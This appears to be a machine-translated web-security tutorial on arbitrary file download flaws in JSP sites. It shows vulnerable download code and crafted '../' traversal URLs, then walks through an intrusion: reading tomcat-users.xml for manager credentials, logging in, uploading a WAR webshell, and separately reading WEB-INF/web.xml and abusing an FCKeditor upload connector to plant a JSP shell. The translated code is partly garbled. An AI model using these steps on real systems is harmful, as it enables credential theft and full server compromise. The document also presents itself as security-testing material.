Any file download Vulnerability JSP site

Where to appear:

The general Web site provides the ability to download files, the general idea is to use a dynamic page (PHP, JSP, ASPX, ASP, etc.) to download the file as parameters the general parameter name is filename, such as. Php?filename/.jsp?filename. The general implementation process is to obtain the absolute path to the file on the Web site, read the file, and then send it directly to the client download, based on the value of the parameter filename. The general implementation code is as follows: (JSP implementation of file download code, other language implementation process similar)
<%@ page contenttype= "Application;"%>
<%@ page import= "java.util.*,java.io.*,java.sql.*,java.text.*"%>
<%
Response.setcontenttype ("Application/unknown");
URL parameter incoming file name
String filename =
Java.net.URLDecoder.decode (Request.getparameter ("FileName"));
String filename2 = "";
filename2 = filename;
Get the file absolute path
File File = new
File ("/home/zzang/www/jsphome/jm/thesisupload/" +filename);
byte b[] = new byte[(int) file.length ()];
Return files to be downloaded directly to the client
Response.setheader ("Content-disposition", "attachment;filename=" + filename2 + ";");
if (File.isfile ()) {
Bufferedinputstream fin = new Bufferedinputstream (new FileInputStream (file));
Bufferedoutputstream outs = new Bufferedoutputstream (Response.getoutputstream ());
int read = 0;
while (read = Fin.read (b))! =-1) {
Outs.write (B,0,read);}
Outs.close ();
Fin.close ();}
%>
This code is implemented to download the file to the client, but if the incoming parameter filename is not filtered, you can implement the download service any file, resulting in any file download vulnerability.

Test method:

1. Add aa/to the path: /See if you can backtrack (determine site and directory)

Original link:
Http://edu.test.net/test/student_demo/Question_DownLoad.php?filename=2006101884105_Reply.doc
Modify:
Http://edu.test.net/test/student_demo/Question_DownLoad.php?filename=aa/../2006101884105_Reply.doc
Two downloads same file, continue testing

2. Determine if any files can be downloaded

The modification request is:
http://edu.test.net/test/student_demo/Question_DownLoad.php?filename=test/student_demo/Question_DownLoad.php
An attempt was made to download the source code for the downloaded file, and if the prompt does not exist, it could be any file download vulnerability that was added in the path: /until it is downloaded to the file. If the prompt type is wrong, it may not be an arbitrary file download vulnerability.
Final download of a successful request
http://edu.test.net/test/student_demo/Question_DownLoad.php?filename=../../../test/student_demo/Question_DownLoad.php

Utilization process

Any site that exploits this vulnerability, the first step is to determine the root directory of the Web site. So let's start by describing how to determine the site root directory.
The first step: Determine the root directory of the site, the general files to be downloaded are placed in the sub-folder of the site, the number of subfolders is variable, so you need to use the path backtracking (.. /) Determine the root directory of the Web site.
For example: A download point:
Http://www.test.com.cn/DownLoad.aspx?fileName=%C4%EA%B6%C8%C9%F3%BA%CB%B1%ED.doc

You can download the file.
You can see download.aspx in the site root directory, so download
Http://www.test.com.cn/DownLoad.aspx?fileName=download.aspx
Error:

Use backtracking (.. /) Determine the site root directory
Http://www.test.com.cn/DownLoad.aspx?fileName=../download.aspx
Failed
Http://www.test.com.cn/DownLoad.aspx?fileName=../../download.aspx

The download succeeds, you can determine the download point, two backtracking can go back to the root directory. Open the file and look at the contents:

You can determine that the downloaded file is correct.

There are some differences in how different Web sites are exploited for this vulnerability. Therefore, the following are described separately:

1. JSP site
This section focuses on two simple ways to use it, download the Tomcat configuration file and download the source code for the Web site itself.
1) A download point for the JSP site:
http://www.test.cn/down.jsp?filename=%D5%D0%B1%EA%CF%EE%C4%BF%C9%EA%C7%EB1.doc&path=C:/Program%20Files/ Apache%20software%20foundation/tomcat%206.0/webapps/ztbwz/upload/%d5%d0%b1%ea%cf%ee%c4%bf%c9%ea%c7%eb1.doc
You can see the download point, there are two parameters, is actually the same, it is easy to see that path is the absolute path of the file to be downloaded on the server. And it is important that the site is placed under the Tomcat installation path, which means that you can access Tomcat's manager/html directly.
Request: Http://www.test.cn/manager/html

You can see that the access is OK, enter the user name and password to log in.
So the next step is to download the Tomcat configuration file Tomcat-users.xml (the user name and password to save the login)
The first thing you need to know about Tomcat configuration is the following configuration:

Tomcat-users.xml under the Conf file, you can download the file directly using the download point.
So construct the URL as follows:
Http://www.test.cn/down.jsp?filename=tomcat-users.xml&path=C:/Program%20Files/Apache%20Software% 20foundation/tomcat%206.0/conf/tomcat-users.xml
Download Successful:

Open the file for the user name and password

Login

Success

Directly below, upload a war file, you can get Webshell, complete a simple test.

2) Download the source code of the website itself
Download point: Http://test.edu.cn/file.do?method=downFile&fileName=20080505094144.doc
Test not access http://test.edu.cn/manager/html

The above method fails.
First download the configuration file of the Web site JSP configuration file under the root directory Web-inf/web.xml (generally have a lot of content, sometimes including database connection user name and password and other key information)
Access:
Http://test/file.do?method=downFile&fileName=. /web-inf/web.xml

Open after download, key content:

Background using the FCKeditor editor, the editor is a lot of vulnerabilities, directly using the editor directly upload the path
Http://test//admin/FCKeditor/editor/filemanager/browser/default/browser.html? Type=image&connector=connectors/jsp/connector

Choose a Jspshell direct upload, get webshell, no restrictions

System permissions, infiltration completed.

Any file download Vulnerability JSP site